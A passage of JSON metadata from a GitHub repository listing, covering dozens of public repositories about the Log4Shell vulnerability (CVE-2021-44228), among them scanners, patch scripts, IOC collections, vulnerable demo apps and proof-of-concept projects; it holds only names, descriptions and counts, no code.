"user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Nanitor\/log4fix", + "description": "Detect and fix log4j log4shell vulnerability (CVE-2021-44228)", + "fork": false, + "created_at": "2021-12-16T11:54:11Z", + "updated_at": "2022-09-22T23:48:42Z", + "pushed_at": "2021-12-24T13:08:46Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 12, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 438979039, + "name": "scanlist-log4j", + "full_name": "Gyrfalc0n\/scanlist-log4j", + "owner": { + "login": "Gyrfalc0n", + "id": 46728024, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46728024?v=4", + "html_url": "https:\/\/github.com\/Gyrfalc0n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Gyrfalc0n\/scanlist-log4j", + "description": "Simple bash script to scan multiples url for log4j vulnerability (CVE-2021-44228)", + "fork": false, + "created_at": "2021-12-16T12:20:00Z", + "updated_at": "2021-12-20T15:36:11Z", + "pushed_at": "2022-01-12T08:53:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-44228", + "log4j" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 438985997, + "name": "log4shell-demo", + "full_name": "korteke\/log4shell-demo", + "owner": { + "login": "korteke", + "id": 2558348, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2558348?v=4", + "html_url": "https:\/\/github.com\/korteke", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/korteke\/log4shell-demo", + "description": "Simple webapp that is vulnerable to Log4Shell (CVE-2021-44228)", + "fork": false, + "created_at": "2021-12-16T12:44:24Z", + "updated_at": "2021-12-22T12:14:02Z", + "pushed_at": "2023-02-13T22:30:21Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 438992218, + "name": "vuln_spring_log4j2", + "full_name": "recanavar\/vuln_spring_log4j2", + "owner": { + "login": "recanavar", + "id": 9977753, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9977753?v=4", + "html_url": "https:\/\/github.com\/recanavar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/recanavar\/vuln_spring_log4j2", + "description": "Simple Vulnerable Spring Boot Application to Test the CVE-2021-44228 ", + "fork": false, + "created_at": "2021-12-16T13:05:38Z", + "updated_at": "2021-12-16T15:50:45Z", + "pushed_at": "2021-12-16T14:34:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-44228", + "java", + "log4j2", + "spring" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 438998103, + "name": "Burp-Log4j-HammerTime", + "full_name": "DXC-StrikeForce\/Burp-Log4j-HammerTime", + "owner": { + "login": "DXC-StrikeForce", + "id": 77387831, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77387831?v=4", + "html_url": "https:\/\/github.com\/DXC-StrikeForce", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DXC-StrikeForce\/Burp-Log4j-HammerTime", + "description": "Burp Active Scan extension to identify Log4j vulnerabilities CVE-2021-44228 and CVE-2021-45046", + "fork": false, + "created_at": "2021-12-16T13:25:03Z", + "updated_at": "2022-01-08T17:32:58Z", + "pushed_at": "2021-12-16T17:02:30Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 439018822, + "name": "log4j-filescan", + "full_name": "andalik\/log4j-filescan", + "owner": { + "login": "andalik", + "id": 12278569, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12278569?v=4", + "html_url": "https:\/\/github.com\/andalik", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/andalik\/log4j-filescan", + "description": "Scanner recursivo de arquivos desenvolvido em Python 3 para localização e varredura de versões vulneráveis do Log4j2, contemplando análise interna de arquivos JAR (CVE-2021-44228, CVE-2021-45046, CVE-2021-45105 e CVE-2021-44832)", + "fork": false, + "created_at": "2021-12-16T14:29:05Z", + "updated_at": "2022-03-05T22:52:28Z", + "pushed_at": "2022-03-05T23:01:15Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 439019569, + "name": "CVE-2021-44228-Apache-Log4j", + "full_name": "lonecloud\/CVE-2021-44228-Apache-Log4j", + "owner": { + "login": "lonecloud", + "id": 17854123, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17854123?v=4", + "html_url": "https:\/\/github.com\/lonecloud", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lonecloud\/CVE-2021-44228-Apache-Log4j", + "description": "CVE-2021-44228-Apache-Log4j", + "fork": false, + "created_at": "2021-12-16T14:31:14Z", + "updated_at": "2021-12-16T14:31:45Z", + "pushed_at": "2021-12-16T14:31:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 439030654, + "name": "CVE-2021-44228", + "full_name": "gyaansastra\/CVE-2021-44228", + "owner": { + "login": "gyaansastra", + "id": 35690123, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35690123?v=4", + "html_url": "https:\/\/github.com\/gyaansastra", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gyaansastra\/CVE-2021-44228", + "description": "Log4Shell CVE-2021-44228 Vulnerability Scanner and POC", + "fork": false, + "created_at": "2021-12-16T15:04:23Z", + "updated_at": "2021-12-21T05:46:51Z", + "pushed_at": "2021-12-21T07:03:36Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 439060792, + "name": "CVE-2021-44228", + "full_name": "axisops\/CVE-2021-44228", + "owner": { + "login": "axisops", + "id": 5512152, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5512152?v=4", + "html_url": "https:\/\/github.com\/axisops", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/axisops\/CVE-2021-44228", + "description": "log4j mitigation work", + "fork": false, + "created_at": "2021-12-16T16:42:44Z", + "updated_at": "2021-12-16T16:42:44Z", + "pushed_at": "2021-12-16T16:42:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 439071699, + "name": "MyLog4Shell", + "full_name": "kal1gh0st\/MyLog4Shell", + "owner": { + "login": "kal1gh0st", + "id": 56889513, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56889513?v=4", + "html_url": "https:\/\/github.com\/kal1gh0st", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kal1gh0st\/MyLog4Shell", + "description": "Simple Python 3 script to detect the \"Log4j\" Java library vulnerability (CVE-2021-44228) for a list of URLs with multithreading", + "fork": false, + "created_at": "2021-12-16T17:21:22Z", + "updated_at": "2022-02-25T00:05:36Z", + "pushed_at": "2021-12-30T23:42:20Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 439071959, + "name": "log4shell", + "full_name": "hozyx\/log4shell", + "owner": { + "login": "hozyx", + "id": 96227119, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96227119?v=4", + "html_url": "https:\/\/github.com\/hozyx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hozyx\/log4shell", + "description": "Applications that are vulnerable to the log4j CVE-2021-44228\/45046 issue may be detectable by scanning jar, war, ear, zip files to search for the presence of JndiLookup.class.", + "fork": false, + "created_at": "2021-12-16T17:22:17Z", + "updated_at": "2021-12-16T19:22:07Z", + "pushed_at": "2021-12-16T19:22:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 439077328, + "name": "Log4J_checker", + "full_name": "andypitcher\/Log4J_checker", + "owner": { + "login": "andypitcher", + "id": 12878731, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12878731?v=4", + "html_url": "https:\/\/github.com\/andypitcher", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/andypitcher\/Log4J_checker", + "description": "Log4J checker for Apache CVE-2021-44228", + "fork": false, + "created_at": "2021-12-16T17:41:47Z", + "updated_at": "2023-05-07T15:43:13Z", + "pushed_at": "2021-12-16T18:28:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 439093094, + "name": "log4j-cve-2021-44228", + "full_name": "Vulnmachines\/log4j-cve-2021-44228", + "owner": { + "login": "Vulnmachines", + "id": 79006904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4", + "html_url": "https:\/\/github.com\/Vulnmachines", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vulnmachines\/log4j-cve-2021-44228", + "description": null, + "fork": false, + "created_at": "2021-12-16T18:42:08Z", + "updated_at": "2021-12-16T18:42:11Z", + "pushed_at": "2021-12-16T18:42:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 439112800, + "name": "CVE-2021-44228-Apache-Log4j-Rce", + "full_name": "kannthu\/CVE-2021-44228-Apache-Log4j-Rce", + "owner": { + "login": "kannthu", + "id": 22802035, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22802035?v=4", + "html_url": "https:\/\/github.com\/kannthu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kannthu\/CVE-2021-44228-Apache-Log4j-Rce", + "description": null, + "fork": false, + "created_at": "2021-12-16T20:02:09Z", + "updated_at": "2021-12-16T20:05:17Z", + "pushed_at": "2021-12-16T20:05:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 439129728, + "name": "CVE-2021-44228", + "full_name": "Kr0ff\/CVE-2021-44228", + "owner": { + "login": "Kr0ff", + "id": 35173514, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35173514?v=4", + "html_url": "https:\/\/github.com\/Kr0ff", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Kr0ff\/CVE-2021-44228", + "description": "Log4Shell Proof of Concept (CVE-2021-44228)", + "fork": false, + "created_at": "2021-12-16T21:19:17Z", + "updated_at": "2023-08-15T12:51:08Z", + "pushed_at": "2022-04-21T13:23:40Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 439151562, + "name": "log4shell4shell", + "full_name": "suuhm\/log4shell4shell", + "owner": { + "login": "suuhm", + "id": 11504990, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11504990?v=4", + "html_url": "https:\/\/github.com\/suuhm", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/suuhm\/log4shell4shell", + "description": "Log4shell - Multi-Toolkit. Find, Fix & Test possible CVE-2021-44228 vulneraries - provides a complete LOG4SHELL test\/attack environment on shell", + "fork": false, + "created_at": "2021-12-16T23:13:09Z", + "updated_at": "2022-04-23T23:26:29Z", + "pushed_at": "2021-12-23T00:09:08Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "checker", + "hacking", + "linux", + "log4j", + "log4j2", + "log4shell", + "macos", + "patch", + "penetration-testing", + "pentesting", + "proof-of-concept", + "scanner", + "security", + "tomcat", + "vulnerability-scanners", + "windows" + ], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 439179362, + "name": "log4shell-test-exploit", + "full_name": "wajda\/log4shell-test-exploit", + "owner": { + "login": "wajda", + "id": 795479, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/795479?v=4", + "html_url": "https:\/\/github.com\/wajda", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wajda\/log4shell-test-exploit", + "description": "Test exploit of CVE-2021-44228", + "fork": false, + "created_at": "2021-12-17T01:50:22Z", + "updated_at": "2021-12-23T13:48:51Z", + "pushed_at": "2021-12-23T13:48:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 439208776, + "name": "log4shell-poc-lab", + "full_name": "obscuritylabs\/log4shell-poc-lab", + "owner": { + "login": "obscuritylabs", + "id": 36056630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36056630?v=4", + "html_url": "https:\/\/github.com\/obscuritylabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/obscuritylabs\/log4shell-poc-lab", + "description": "A lab demonstration of the log4shell vulnerability: CVE-2021-44228", + "fork": false, + "created_at": "2021-12-17T04:20:40Z", + "updated_at": "2023-07-23T00:49:26Z", + "pushed_at": "2021-12-17T17:21:50Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": true, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 9, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 439217985, + "name": "vCenter-Server-Workaround-Script-CVE-2021-44228", + "full_name": "Fazmin\/vCenter-Server-Workaround-Script-CVE-2021-44228", + "owner": { + "login": "Fazmin", + "id": 1432117, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1432117?v=4", + "html_url": "https:\/\/github.com\/Fazmin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Fazmin\/vCenter-Server-Workaround-Script-CVE-2021-44228", + "description": "Script - Workaround instructions to address CVE-2021-44228 in vCenter Server ", + "fork": false, + "created_at": "2021-12-17T05:14:05Z", + "updated_at": "2023-03-19T00:01:25Z", + "pushed_at": "2022-01-13T14:19:13Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 439234639, + "name": "CVE-2021-44228-Log4j-PoC-RCE", + "full_name": "Grupo-Kapa-7\/CVE-2021-44228-Log4j-PoC-RCE", + "owner": { + "login": "Grupo-Kapa-7", + "id": 80293225, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80293225?v=4", + "html_url": "https:\/\/github.com\/Grupo-Kapa-7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Grupo-Kapa-7\/CVE-2021-44228-Log4j-PoC-RCE", + "description": "PoC RCE Log4j CVE-2021-4428 para pruebas", + "fork": false, + "created_at": "2021-12-17T06:34:51Z", + "updated_at": "2021-12-17T06:38:25Z", + "pushed_at": "2022-01-04T16:58:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 439263342, + "name": "CVE-2021-44228_scanner", + "full_name": "rohan-flutterint\/CVE-2021-44228_scanner", + "owner": { + "login": "rohan-flutterint", + "id": 82864904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82864904?v=4", + "html_url": "https:\/\/github.com\/rohan-flutterint", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rohan-flutterint\/CVE-2021-44228_scanner", + "description": null, + "fork": false, + "created_at": "2021-12-17T08:32:20Z", + "updated_at": "2021-12-17T08:32:31Z", + "pushed_at": "2021-12-17T08:32:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 439273329, + "name": "Fix-Log4j-PowershellScript", + "full_name": "sysadmin0815\/Fix-Log4j-PowershellScript", + "owner": { + "login": "sysadmin0815", + "id": 81157346, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81157346?v=4", + "html_url": "https:\/\/github.com\/sysadmin0815", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sysadmin0815\/Fix-Log4j-PowershellScript", + "description": "Log4Shell mitigation (CVE-2021-44228) - search and remove JNDI class from *log4j*.jar files on the system with Powershell (Windows)", + "fork": false, + "created_at": "2021-12-17T09:09:56Z", + "updated_at": "2024-05-08T09:50:15Z", + "pushed_at": "2021-12-23T10:44:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 439273557, + "name": "log4j-lookups-vulnerability", + "full_name": "RenYuH\/log4j-lookups-vulnerability", + "owner": { + "login": "RenYuH", + "id": 25149383, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25149383?v=4", + "html_url": "https:\/\/github.com\/RenYuH", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RenYuH\/log4j-lookups-vulnerability", + "description": "Log4j2 Vulnerability (CVE-2021-44228)", + "fork": false, + "created_at": "2021-12-17T09:10:50Z", + "updated_at": "2021-12-17T09:52:30Z", + "pushed_at": "2021-12-17T09:52:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 439288883, + "name": "py-log4shellscanner", + "full_name": "scheibling\/py-log4shellscanner", + "owner": { + "login": "scheibling", + "id": 24367830, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24367830?v=4", + "html_url": "https:\/\/github.com\/scheibling", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/scheibling\/py-log4shellscanner", + "description": "Scanner for the Log4j vulnerability dubbed Log4Shell (CVE-2021-44228)", + "fork": false, + "created_at": "2021-12-17T10:06:07Z", + "updated_at": "2021-12-17T10:40:07Z", + "pushed_at": "2021-12-17T10:40:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 439296638, + "name": "CVE-2021-44228", + "full_name": "zaneef\/CVE-2021-44228", + "owner": { + "login": "zaneef", + "id": 54664755, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54664755?v=4", + "html_url": "https:\/\/github.com\/zaneef", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zaneef\/CVE-2021-44228", + "description": "Log4Shell (CVE-2021-44228): Descrizione, Exploitation e Mitigazione", + "fork": false, + "created_at": "2021-12-17T10:36:16Z", + "updated_at": "2021-12-21T11:08:13Z", + "pushed_at": "2021-12-21T08:50:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-44228", + "jndi-exploit", + "jndi-lookups", + "log4j2", + "log4shell" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 439330776, + "name": "log4j-quick-scan", + "full_name": "metodidavidovic\/log4j-quick-scan", + "owner": { + "login": "metodidavidovic", + "id": 75225635, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75225635?v=4", + "html_url": "https:\/\/github.com\/metodidavidovic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/metodidavidovic\/log4j-quick-scan", + "description": "Scan your IP network and determine hosts with possible CVE-2021-44228 vulnerability in log4j library.", + "fork": false, + "created_at": "2021-12-17T12:49:59Z", + "updated_at": "2021-12-21T14:51:50Z", + "pushed_at": "2021-12-21T14:51:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 439385857, + "name": "log4shell-iocs", + "full_name": "WatchGuard-Threat-Lab\/log4shell-iocs", + "owner": { + "login": "WatchGuard-Threat-Lab", + "id": 31286181, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31286181?v=4", + "html_url": "https:\/\/github.com\/WatchGuard-Threat-Lab", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/WatchGuard-Threat-Lab\/log4shell-iocs", + "description": "A collection of IOCs for CVE-2021-44228 also known as Log4Shell", + "fork": false, + "created_at": "2021-12-17T15:58:14Z", + "updated_at": "2021-12-17T15:59:33Z", + "pushed_at": "2021-12-17T15:58:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 439393950, + "name": "log4j-patched", + "full_name": "Aschen\/log4j-patched", + "owner": { + "login": "Aschen", + "id": 4447392, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4447392?v=4", + "html_url": "https:\/\/github.com\/Aschen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Aschen\/log4j-patched", + "description": "Provide patched version of Log4J against CVE-2021-44228 and CVE-2021-45046 as well as a script to manually patch it yourself", + "fork": false, + "created_at": "2021-12-17T16:26:12Z", + "updated_at": "2021-12-19T18:29:10Z", + "pushed_at": "2021-12-17T18:41:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 439409726, + "name": "cve-2021-44228", + "full_name": "Nikolas-Charalambidis\/cve-2021-44228", + "owner": { + "login": "Nikolas-Charalambidis", + "id": 21295587, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21295587?v=4", + "html_url": "https:\/\/github.com\/Nikolas-Charalambidis", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Nikolas-Charalambidis\/cve-2021-44228", + "description": "A simple simulation of the infamous CVE-2021-44228 issue.", + "fork": false, + "created_at": "2021-12-17T17:23:47Z", + "updated_at": "2022-12-02T02:40:53Z", + "pushed_at": "2021-12-18T13:45:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-44228", + "java", + "java-11", + "log4j", + "security" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 439420251, + "name": "detect-log4j-exploitable", + "full_name": "m0rath\/detect-log4j-exploitable", + "owner": { + "login": "m0rath", + "id": 17716312, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17716312?v=4", + "html_url": "https:\/\/github.com\/m0rath", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/m0rath\/detect-log4j-exploitable", + "description": "CVE-2021-44228", + "fork": false, + "created_at": "2021-12-17T18:03:50Z", + "updated_at": "2021-12-20T17:53:14Z", + "pushed_at": "2021-12-20T17:53:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 439430099, + "name": "CVE-2021-44228-VULN-APP", + "full_name": "nu11secur1ty\/CVE-2021-44228-VULN-APP", + "owner": { + "login": "nu11secur1ty", + "id": 3677559, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3677559?v=4", + "html_url": "https:\/\/github.com\/nu11secur1ty", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nu11secur1ty\/CVE-2021-44228-VULN-APP", + "description": null, + "fork": false, + "created_at": "2021-12-17T18:45:19Z", + "updated_at": "2024-08-12T20:18:58Z", + "pushed_at": "2023-02-22T12:12:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 439444176, + "name": "log4j-docker", + "full_name": "ankur-katiyar\/log4j-docker", + "owner": { + "login": "ankur-katiyar", + "id": 7027426, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7027426?v=4", + "html_url": "https:\/\/github.com\/ankur-katiyar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ankur-katiyar\/log4j-docker", + "description": "Docker images and k8s YAMLs for Log4j Vulnerability POC (Log4j (CVE-2021-44228 RCE Vulnerability)", + "fork": false, + "created_at": "2021-12-17T19:50:40Z", + "updated_at": "2022-04-21T01:41:08Z", + "pushed_at": "2021-12-20T16:39:28Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 439447817, + "name": "Log4j-JNDIServer", + "full_name": "immunityinc\/Log4j-JNDIServer", + "owner": { + "login": "immunityinc", + "id": 17729016, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17729016?v=4", + "html_url": "https:\/\/github.com\/immunityinc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/immunityinc\/Log4j-JNDIServer", + "description": "This project will help to test the Log4j CVE-2021-44228 vulnerability.", + "fork": false, + "created_at": "2021-12-17T20:07:12Z", + "updated_at": "2022-06-30T02:03:56Z", + "pushed_at": "2021-12-22T20:17:36Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 9, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 439496578, + "name": "PowerShell-Log4J-Scanner", + "full_name": "DANSI\/PowerShell-Log4J-Scanner", + "owner": { + "login": "DANSI", + "id": 4057240, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4057240?v=4", + "html_url": "https:\/\/github.com\/DANSI", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DANSI\/PowerShell-Log4J-Scanner", + "description": "can find, analyse and patch Log4J files because of CVE-2021-44228, CVE-2021-45046", + "fork": false, + "created_at": "2021-12-18T00:51:46Z", 